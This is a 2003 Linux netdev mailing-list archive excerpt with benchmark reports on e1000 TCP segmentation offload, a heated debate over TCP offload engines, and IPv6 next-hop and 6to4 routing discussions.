(8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6F5V11A010476; Mon, 14 Jul 2003 22:31:01 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6F5V1rK026972; Mon, 14 Jul 2003 22:31:01 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6F5V1FU026968; Mon, 14 Jul 2003 22:31:01 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16147.37268.946613.965075@napali.hpl.hp.com> Date: Mon, 14 Jul 2003 22:31:00 -0700 To: "Feldman, Scott" Cc: davidm@hpl.hp.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter In-Reply-To: <20030714214510.17e02a9f.davem@redhat.com> References: <20030714214510.17e02a9f.davem@redhat.com> X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4040 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev [Scott, somehow I never received your original response so I'm replying based on what I saw in the linux.kernel newgroup...] Scott> Do you have any data to share? Sure, I don't see why not. Here are the number I got: TSO disabled: $ modprobe InterruptThrottleRate=0,0,0,0 TSO=0,0,0,0 $ netperf -l 30 -c -C -H foobar -- -s64K -S64K TCP STREAM TEST to foobar Recv Send Send Utilization Service Demand Socket Socket Message Elapsed Send Recv Send Recv Size Size Size Time Throughput local remote local remote bytes bytes bytes secs. 10^6bits/s % S % S us/KB us/KB 131070 131072 131072 30.00 897.16 34.07 35.00 3.111 3.196 TSO enabled: $ modprobe InterruptThrottleRate=0,0,0,0 TSO=1,1,1,1 $ netperf -l 30 -c -C -H foobar -- -s64K -S64K TCP STREAM TEST to foobar Recv Send Send Utilization Service Demand Socket Socket Message Elapsed Send Recv Send Recv Size Size Size Time Throughput local remote local remote bytes bytes bytes secs. 10^6bits/s % S % S us/KB us/KB 131070 131072 131072 30.00 894.09 11.65 34.48 1.068 3.159 This looks roughly like you'd expect: with TSO, slightly lower throughput but much less CPU overhead. With ftp, things get stranger: fetching a 2GByte file via ftp get (from the remote end): TSO disabled: ftp> get big.iso /dev/null local: /dev/null remote: big.iso 200 PORT command successful. 150 Opening BINARY mode data connection for 'big.iso' (2038628352 bytes). 226 Transfer complete. 2038628352 bytes received in 18.17 secs (109554.5 kB/s) ftp server CPU utilization: ~ 40% With TSO enabled: ftp> get big.iso /dev/null local: /dev/null remote: big.iso 200 PORT command successful. 150 Opening BINARY mode data connection for 'big.iso' (2038628352 bytes). 226 Transfer complete. 2038628352 bytes received in 21.16 secs (94070.2 kB/s) ftp server CPU utilization: ~ 15% So we get almost 15% of throughput drop. This was with plain "netkit fptd". AFAIK, it does a simple read/write loop (not sendfile()). --david From jros@xiran.com Mon Jul 14 22:44:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:44:25 -0700 (PDT) Received: from xout2-dmz.simpletech.com (xout2.simpletech.com [208.178.183.22]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5i5Fl026577 for ; Mon, 14 Jul 2003 22:44:05 -0700 Received: from mail pickup service by xout2-dmz.simpletech.com with Microsoft SMTPSVC; Mon, 14 Jul 2003 22:42:56 -0700 Received: from STXCHG1.simpletech.com ([172.16.0.145]) by xout2-dmz.simpletech.com with Microsoft SMTPSVC(5.0.2195.5329); Mon, 14 Jul 2003 22:42:55 -0700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C34A93.F094F44C" Subject: RE: TCP IP Offloading Interface Date: Mon, 14 Jul 2003 22:42:55 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: RE: TCP IP Offloading Interface thread-index: AcNKk/ABXvjlRUczR9KtMKhS3c7zQQ== From: "Jordi Ros" To: , , , , X-OriginalArrivalTime: 15 Jul 2003 05:42:55.0632 (UTC) FILETIME=[F0C0C900:01C34A93] X-archive-position: 4041 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jros@xiran.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. ------_=_NextPart_001_01C34A93.F094F44C Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable David, TCP offloading does not necessarily need to be the goal but a MUST if = one wants to build a performance-scalable architecture. This vision is = in fact introduced by Mogul in his paper. He writes: "Therefore, = offloading the transport layer becomes valuable not for its own sake, = but rather because that allows offloading of the RDMA [...]". > TOE is evil, read this: > http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf > TOE is exactly suboptimal for the very things performance > matters, high connection rates. It is important to understand as well that as Mogul presents, RDMA is = just one good example, but not the only one. Note that you can change = the word RDMA in Mogul's quote by the following two words and still the = same argument applies: Encryption and Direct Path. 1) Encryption: Apostolopoulos et al ("Securing Electronic Commerce: = Reducing the SSL Overhead," IEEE Network Magazine, July/August 2000) = proved that overheads due to software encryption can make the servers = slower by two orders of magnitude. Because SSL runs on top of the = transport protocol, if you want to do SSL in HW then you are better off = having the transport offloaded and embedding your SSL asic on the board = (this is exactly the same argument that Mogul presents on the case of = RDMA). Assuming an encryption asic that can run at wire speed, this = would mean about 100 times performance improvement, not just 2 or 3 = times. 2) Direct Path (tm) from network to storage. Current architecture = requires a complete round trip to the kernel-user space in order to = retrieve data from the storage and dump it back to the network. The = router guys already know what it is to design an architecture based on = the separation of control plane and data plane. Now, does today's server = architecture do any separation? the answer is no. This is what Xiran = Labs (www.xiran.com) has designed. The server is accelerated by = providing a Direct Path from storage to network (data plane) using an = asic board that has: (1) network interface + (2) storage interface + (3) = PCI interface + (4) intelligence. The control plane runs at the host = side and interfaces with the board through the pci interface. The data = plane runs in the direct path on the asic board completely bypassing the = host. All the data is transported in zero copy, directly from storage to = network, using asic engines that perform optimized tasks (such as tcp = segmentation or checksumming, among others). There is no interrupts to = the host. The efficiency, in terms of bits per cycle, is today 6 times = superior compared to current architecture (see = www.ipv6-es.com/03/documents/xiran/xiran_ipv6_paper.pdf). As an example, = there are two well defined applications for Direct Path. Video streaming = and ISCSI. The reason why they are well defined is because both require = the transport of massive amount of data (data plane). In both cases one = can show an important improve in performance. TOE is believed to not provide performance. I may agree that TOE by = itself may not, but TOE as a means to deliver some other technology = (e.g. RDMA, encryption or Direct Path) it does optimize (in some = instance dramatically) the overall performance. Let me show you the = numbers in our Direct Path technology.=20 We have partnered with Real Networks to build the concept of control = plane and data plane separation in their Helix platform. The system in = fact runs on a Redhat linux box. The data plane (RTP) runs on the Direct = Path board and completely bypasses the host (whether it is udp based or = tcp, the data plane connections are routed through the board directly to = storage). The control plane (RTCP) runs on the host (the tcp connection = is routed to the host). While a Linux box that uses a regular nic card = can deliver 300 Mbps of video streaming out of storage at 90% CPU host = utilization, by changing in the same system the regular nic card with a = Direct Path board we can get 600 Mbps with only 3% CPU host utilization. = The reason is because the direct path is completely zero copy, and it = provides hw accelerated functions. As for scalability, by using 'n' = direct path boards in the same system, you get n times the throughput = and a utilization of n*3% at the host CPU side because the system can = scale (since each direct path board is physically isolated from each = other). This technology has been presented in several conferences and is = in alpha phase as we speak. Note that Microsoft is considering TOE under its Scalable Networking = Program. To keep linux competitive, I would encourage a healthy = discussion on this matter. Again, TOE is not the goal but the means to = deliver important technologies for the next generation of servers. This = will be critical as the backbone of the Internet goes to all optical = networks while the servers stay at the electronic domain. As shown by = McKeown, "Circuit Switching in the Core", the line capacity of the = optical fibers is doubling every 7 months while the processing CPU = capacity (Moore's law) can only double every 18 months.=20 jordi =20 =20 -----Original Message----- From: linux-net-owner@vger.kernel.org [mailto:linux-net-owner@vger.kernel.org]On Behalf Of David S. Miller Sent: Sunday, July 13, 2003 12:48 AM To: Alan Shih Cc: linux-kernel@vger.kernel.org; linux-net@vger.kernel.org; netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface =20 Your return is also absolutely questionable. Servers "serve" data and we offload all of the send side TCP processing that can reasonably be done (segmentation, checksumming). I've never seen an impartial benchmark showing that TCP send side performance goes up as a result of using TOE vs. the usual segmentation + checksum offloading offered today. On receive side, clever RX buffer flipping tricks are the way to go and require no protocol changes and nothing gross like TOE or weird buffer ownership protocols like RDMA requires. I've made postings showing how such a scheme can work using a limited flow cache on the networking card. I don't have a reference handy, but I suppose someone else does. And finally, this discussion belongs on the "networking" lists. Nearly all of the "networking" developers don't have time to sift through linux-kernel every day. - To unsubscribe from this list: send the line "unsubscribe linux-net" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html =20 =20 =20 PROPRIETARY-CONFIDENTIAL INFORMATION INCLUDED This electronic transmission, and any documents attached hereto, may = contain confidential, proprietary and/or legally privileged information. = The information is intended only for use by the recipient named above. = If you received this electronic message in error, please notify the = sender and delete the electronic message. Any disclosure, copying, = distribution, or use of the contents of information received in error is = strictly prohibited, and violators will be pursued legally. ------_=_NextPart_001_01C34A93.F094F44C Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: quoted-printable
=0A=

David,

=0A=

TCP offloading does not necessarily need to be the goal but a MUST if = one =0A= wants to build a performance-scalable architecture. This vision is in = fact =0A= introduced by Mogul in his paper. He writes: "Therefore, offloading the =0A= transport layer becomes valuable not for its own sake, but rather = because that =0A= allows offloading of the RDMA [...]".

=0A=

> TOE is evil, read this:

=0A=

> =0A= http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf

=0A=

> TOE is exactly suboptimal for the very things performance

=0A=

> matters, high connection rates.

=0A=

It is important to understand as well that as Mogul presents, RDMA is = just =0A= one good example, but not the only one. Note that you can change the = word RDMA =0A= in Mogul's quote by the following two words and still the same argument = applies: =0A= Encryption and Direct Path.

=0A=

1) Encryption: Apostolopoulos et al ("Securing Electronic Commerce: = Reducing =0A= the SSL Overhead," IEEE Network Magazine, July/August 2000) proved that =0A= overheads due to software encryption can make the servers slower by two = orders =0A= of magnitude. Because SSL runs on top of the transport protocol, if you = want to =0A= do SSL in HW then you are better off having the transport offloaded and =0A= embedding your SSL asic on the board (this is exactly the same argument = that =0A= Mogul presents on the case of RDMA). Assuming an encryption asic that = can run at =0A= wire speed, this would mean about 100 times performance improvement, not = just 2 =0A= or 3 times.

=0A=

2) Direct Path (tm) from network to storage. Current architecture = requires a =0A= complete round trip to the kernel-user space in order to retrieve data = from the =0A= storage and dump it back to the network. The router guys already know = what it is =0A= to design an architecture based on the separation of control plane and = data =0A= plane. Now, does today's server architecture do any separation? the = answer is =0A= no. This is what Xiran Labs (www.xiran.com) has designed. The server is =0A= accelerated by providing a Direct Path from storage to network (data = plane) =0A= using an asic board that has: (1) network interface + (2) storage = interface + =0A= (3) PCI interface + (4) intelligence. The control plane runs at the host = side =0A= and interfaces with the board through the pci interface. The data plane = runs in =0A= the direct path on the asic board completely bypassing the host. All the = data is =0A= transported in zero copy, directly from storage to network, using asic = engines =0A= that perform optimized tasks (such as tcp segmentation or checksumming, = among =0A= others). There is no interrupts to the host. The efficiency, in terms of = bits =0A= per cycle, is today 6 times superior compared to current architecture = (see =0A= www.ipv6-es.com/03/documents/xiran/xiran_ipv6_paper.pdf). As an example, = there =0A= are two well defined applications for Direct Path. Video streaming and = ISCSI. =0A= The reason why they are well defined is because both require the = transport of =0A= massive amount of data (data plane). In both cases one can show an = important =0A= improve in performance.

=0A=

TOE is believed to not provide performance. I may agree that TOE by = itself =0A= may not, but TOE as a means to deliver some other technology (e.g. RDMA, =0A= encryption or Direct Path) it does optimize (in some instance = dramatically) the =0A= overall performance. Let me show you the numbers in our Direct Path = technology. =0A=

=0A=

We have partnered with Real Networks to build the concept of control = plane =0A= and data plane separation in their Helix platform. The system in fact = runs on a =0A= Redhat linux box. The data plane (RTP) runs on the Direct Path board and =0A= completely bypasses the host (whether it is udp based or tcp, the data = plane =0A= connections are routed through the board directly to storage). The = control plane =0A= (RTCP) runs on the host (the tcp connection is routed to the host). = While a =0A= Linux box that uses a regular nic card can deliver 300 Mbps of video = streaming =0A= out of storage at 90% CPU host utilization, by changing in the same = system the =0A= regular nic card with a Direct Path board we can get 600 Mbps with only = 3% CPU =0A= host utilization. The reason is because the direct path is completely = zero copy, =0A= and it provides hw accelerated functions. As for scalability, by using = 'n' =0A= direct path boards in the same system, you get n times the throughput = and a =0A= utilization of n*3% at the host CPU side because the system can scale = (since =0A= each direct path board is physically isolated from each other). This = technology =0A= has been presented in several conferences and is in alpha phase as we = speak.

=0A=

Note that Microsoft is considering TOE under its Scalable Networking = Program. =0A= To keep linux competitive, I would encourage a healthy discussion on = this =0A= matter. Again, TOE is not the goal but the means to deliver important =0A= technologies for the next generation of servers. This will be critical = as the =0A= backbone of the Internet goes to all optical networks while the servers = stay at =0A= the electronic domain. As shown by McKeown, "Circuit Switching in the = Core", the =0A= line capacity of the optical fibers is doubling every 7 months while the =0A= processing CPU capacity (Moore's law) can only double every 18 months. =

=0A=

jordi

=0A=

 

=0A=

 

=0A=

-----Original Message-----

=0A=

From: linux-net-owner@vger.kernel.org

=0A=

[mailto:linux-net-owner@vger.kernel.org]On Behalf Of David S. = Miller

=0A=

Sent: Sunday, July 13, 2003 12:48 AM

=0A=

To: Alan Shih

=0A=

Cc: linux-kernel@vger.kernel.org; linux-net@vger.kernel.org;

=0A=

netdev@oss.sgi.com

=0A=

Subject: Re: TCP IP Offloading Interface

=0A=

 

=0A=

Your return is also absolutely questionable. Servers "serve" data

=0A=

and we offload all of the send side TCP processing that can

=0A=

reasonably be done (segmentation, checksumming).

=0A=

I've never seen an impartial benchmark showing that TCP send

=0A=

side performance goes up as a result of using TOE vs. the usual

=0A=

segmentation + checksum offloading offered today.

=0A=

On receive side, clever RX buffer flipping tricks are the way

=0A=

to go and require no protocol changes and nothing gross like

=0A=

TOE or weird buffer ownership protocols like RDMA requires.

=0A=

I've made postings showing how such a scheme can work using a = limited

=0A=

flow cache on the networking card. I don't have a reference handy,

=0A=

but I suppose someone else does.

=0A=

And finally, this discussion belongs on the "networking" lists.

=0A=

Nearly all of the "networking" developers don't have time to sift

=0A=

through linux-kernel every day.

=0A=

-

=0A=

To unsubscribe from this list: send the line "unsubscribe linux-net" = in

=0A=

the body of a message to majordomo@vger.kernel.org

=0A=

More majordomo info at http://vger.kernel.org/majordomo-info.html

=0A=

 

=0A=

 

=0A=

 


PROPRIETARY-CONFIDENTIAL INFORMATION = INCLUDED

This electronic transmission, and any documents = attached hereto, may contain confidential, proprietary and/or legally = privileged information. The information is intended only for use by the = recipient named above. If you received this electronic message in error, = please notify the sender and delete the electronic message. Any = disclosure, copying, distribution, or use of the contents of information = received in error is strictly prohibited, and violators will be pursued = legally.

------_=_NextPart_001_01C34A93.F094F44C-- From davem@redhat.com Mon Jul 14 22:48:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:48:47 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5mhFl026957 for ; Mon, 14 Jul 2003 22:48:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA12791; Mon, 14 Jul 2003 22:38:23 -0700 Date: Mon, 14 Jul 2003 22:38:22 -0700 From: "David S. Miller" To: davidm@hpl.hp.com Cc: davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-Id: <20030714223822.23b78f9b.davem@redhat.com> In-Reply-To: <16147.37268.946613.965075@napali.hpl.hp.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4042 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 22:31:00 -0700 David Mosberger wrote: > With TSO enabled: > > ftp> get big.iso /dev/null > local: /dev/null remote: big.iso > 200 PORT command successful. > 150 Opening BINARY mode data connection for 'big.iso' (2038628352 bytes). > 226 Transfer complete. > 2038628352 bytes received in 21.16 secs (94070.2 kB/s) > > ftp server CPU utilization: ~ 15% > > So we get almost 15% of throughput drop. This was with plain "netkit > fptd". AFAIK, it does a simple read/write loop (not sendfile()). When we use TSO for non-sendfile() applications it really stresses memory allocations. We do these 64K+ kmalloc()'s for each packet we construct. But I don't think that's what is happening here, rather the PCI controller is "talking" to the CPU's L2 cache with coherency transactions on all the data of every packet going to the chip. Whereas with a sendfile() type setup, the PCI controller is going straight to main memory for the data part of the packets since the CPU is unlikely to have each page cache page in it's L2 caches. In the sendmsg() case, it's virtually guarenteed that the cpu will have all the packet data in it's L2 cache in an unshared-modified state. I know how this can be fixed, can you use L2-bypassing stores in your csum_and_copy_from_user() and copy_from_user() implementations like we do on sparc64? That would exactly eliminate this situation where the card is talking to the cpu's L2 cache for all the data during the PCI DMA transation on the send side. From davem@redhat.com Mon Jul 14 23:00:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:00:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F60mFl029015 for ; Mon, 14 Jul 2003 23:00:49 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA12813; Mon, 14 Jul 2003 22:51:33 -0700 Date: Mon, 14 Jul 2003 22:51:33 -0700 From: "David S. Miller" To: "Jordi Ros" Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com, alan@storlinksemi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030714225133.18395b69.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4043 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 22:42:55 -0700 "Jordi Ros" wrote: [ Please fix Outlook Express or whatever lame email client you use to put newlines into the emails that you compose. These excessive long lines make your emails nearly impossible to read ] > TCP offloading does not necessarily need to be the goal but a MUST > if one wants to build a performance-scalable architecture. This > vision is in fact introduced by Mogul in his paper. He writes: > "Therefore, offloading the transport layer becomes valuable not for > its own sake, but rather because that allows offloading of the RDMA > [...]". I totally disagree. It is not a MUST, in fact I have described an alternative implementation that requires none of the complexity or RDMA, and none of the stupidity of TOE. Read my lips: "We do not need to offload TCP itself to get the attributes you desire, therefore we are NOT going to do it." You can choose to ignore my suggestions and likewise I will continue to ignore the endless (and frankly, broing after reading it for the 100th time) spouting from people like you that we somehow "NEED" or "MUST" have TOE, which is complete bullshit as exemplified by my alternative example scheme. You also ignore the points others have made that the systems HAVE SCALED to evolving networks technologies as they have become faster and faster. And when you ignore me, don't be surprised when other companies come along, implement my scheme, it gets supported in Linux and subsequently the stock of your company effectively becomes toilet paper and TOE is an obscure piece of computing history gone wrong :-) > TOE is believed to not provide performance. I may agree that TOE by > itself may not, but TOE as a means to deliver some other technology > (e.g. RDMA, encryption or Direct Path) it does optimize (in some > instance dramatically) the overall performance. Let me show you the > numbers in our Direct Path technology. But our point is that you don't need any of this crap. My RX receive page accumulation scheme handles all of the receive side problems with touching the data and getting into the filesystem and then the device. With my scheme you can receive the data, go direct to the device, and the cpu never touches one byte. > Note that Microsoft is considering TOE under its Scalable Networking > Program. To keep linux competitive, I would encourage a healthy > discussion on this matter I actually welcome Microsoft falling into this rathole of a technology. Let them have to support that crap and have to field bug reports on it, having to wonder who created the packets. And let them deal with the negative effects TOE has on connection rates and things like that. Linux will be competitive, especially if people develop the scheme I have described several times into the hardware. There are vendors doing this, will you choose to be different and ignore this? From pekkas@netcore.fi Mon Jul 14 23:14:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:14:34 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F6ESFl029572 for ; Mon, 14 Jul 2003 23:14:29 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6F6E7I07635; Tue, 15 Jul 2003 09:14:07 +0300 Date: Tue, 15 Jul 2003 09:14:07 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: "David S. Miller" , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307142349.DAA06134@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4044 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Alexey, please add some sanity to this discussion. > > It is about anycast addresses, I maybe not competent here. > I have no idea what is purpose of all-routers anycast. > > However, my modest opinion is here: > > IN NO WAY ANYCAST ADDRESSES MAY BE USED AS NEXTHOP ADDRESSES. > NEXTHOP ADDRESS IS THE ADDRESS WHICH IS EXPECTED TO BE SOURCE OF REDIRECT > MESSAGES ET AL. ANYCAST ADDRESSES ARE INVALID AS SOURCE, HENCE... Modestly, I disagree. You just can't get away from the requirement of having be able to "resolve" next-hops. I.e., the requirement that the users/protocols will give you non-final nexthop information which you have to "resolve" to get the final nexthop (e.g. a global address -> a link-local address obtained using Neighbor Discovery). You want to avoid that: simple IPv4 routers can, but IPv6 in particular, as it implements different scopes which are used extensively especially with Neighbor Discovery, can't really live without it. I'm not sure about the level of complexity resolvable next-hops cause, but it shouldn't be huge. The tricky part where proprietary vendors often break are the cases when the "global nexthop" changes but the mapping to the resolved nexthop is not updated. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From pekkas@netcore.fi Mon Jul 14 23:28:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:28:39 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F6SRFl030051 for ; Mon, 14 Jul 2003 23:28:28 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6F6SCP07714; Tue, 15 Jul 2003 09:28:12 +0300 Date: Tue, 15 Jul 2003 09:28:11 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: "David S. Miller" , , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307142329.DAA06071@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4045 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Hey guys, even though yoshfuji is away I don't see any > > reason why I shouldn't apply the patch below to both > > 2.4.x and 2.5.x. It looks very uncontroversial to me. > > > > Any objections? > > I would wait for experts. > > Technically IPv6 does not allow use of non-link-local address > as nexthop address, because nexthop address is expected to be unique > for router. I think we have two choices here: 1) modify /sbin/ip and /sbin/route (and the rest if any) so that they'll parse global next-hop information and resolve it for the kernel, and report the resolved information to the kernel (see the other thread) 2) the kernel supports "must-resolve" next-hops. > Use of IPv4-COMPAT format for tunnels was a hack to make use of tunnel more > handly, it just a tricky way to encapsulate an IPv4 address inside > IPv6 one, it has nothing to do with _real_ IPv4-COMPAT addresses, > (though logically IPv4-COMPAT addresses _are_ really link-local > for 6over4 "network") it is just an element of our API. Use of 6of4 address > is very strange idea in this context, it does not contradict to anything, > of course, but it looks utterly stupid: 6to4 is a complicated format, where > information about nexthop is encoded in an inapproriate way. > The questions sort of: "What the hell? I do a route with nexthop > 2002:x:y::a:b and a:b disappears somewhere." And the question is right, > because plain logic requires to use a:b as meaningful part of nexthop, > it is the part which provides node _identity_, x:y is just routing information, > identifying particullar "6to4" network, it is meaningless when used > as a nexthop address. Apart from architectural purity (I agree it's messy), I think the practical situation is rather simple: for the case of a:b in 6to4, they're always irrelevant. They always refer to the same next-hop whatever information you'll put in there, the implementations won't care (because as a next-hop, it's just a way of saying "the router at address 2002:V4ADDR". Note that nothing _prevents_ you from treating a:b in 2002:x:y::a:b as a meaningful part of the nexthop. They'll just always refer to the same node for whatever a:b you use. Note that the prefix length of 2002:x:y::a:b is /16 -- you should really rewrite your next-hop considerations with s/a:b/x:y::a:b/. I think the problem for of implementation is that "6to4" technique has just been hacked in (but quite nicely). It's a bit, but not much, more special than that IMO. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Mon Jul 14 23:58:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:58:12 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F6vxFl030841 for ; Mon, 14 Jul 2003 23:58:00 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6F6xUBo012775; Tue, 15 Jul 2003 15:59:30 +0900 Date: Tue, 15 Jul 2003 15:59:30 +0900 (JST) Message-Id: <20030715.155930.65250697.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307150117.FAA06705@dub.inr.ac.ru> References: <200307150117.FAA06705@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4046 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <200307150117.FAA06705@dub.inr.ac.ru> (at Tue, 15 Jul 2003 05:17:53 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Hello! > > > inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to > > IPv6. Are you agreeable to this ? > ... > > + IFA_IFFLAGS, > > What's about ifa_flags? There is some space there, and the things > kept there now: TENTATIVE/DEPRECATED et al. are close relatives > of O/M. Alexey, O/M are not flags for addresses, but for interfaces. I believe we should not mix them up. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From chas@locutus.cmf.nrl.navy.mil Tue Jul 15 05:54:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 05:55:17 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FCsuFl012283 for ; Tue, 15 Jul 2003 05:54:57 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6FCshsG028747; Tue, 15 Jul 2003 08:54:43 -0400 (EDT) Message-Id: <200307151254.h6FCshsG028747@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM] some misc sk-related fixups for atm Reply-To: chas3@users.sourceforge.net Date: Tue, 15 Jul 2003 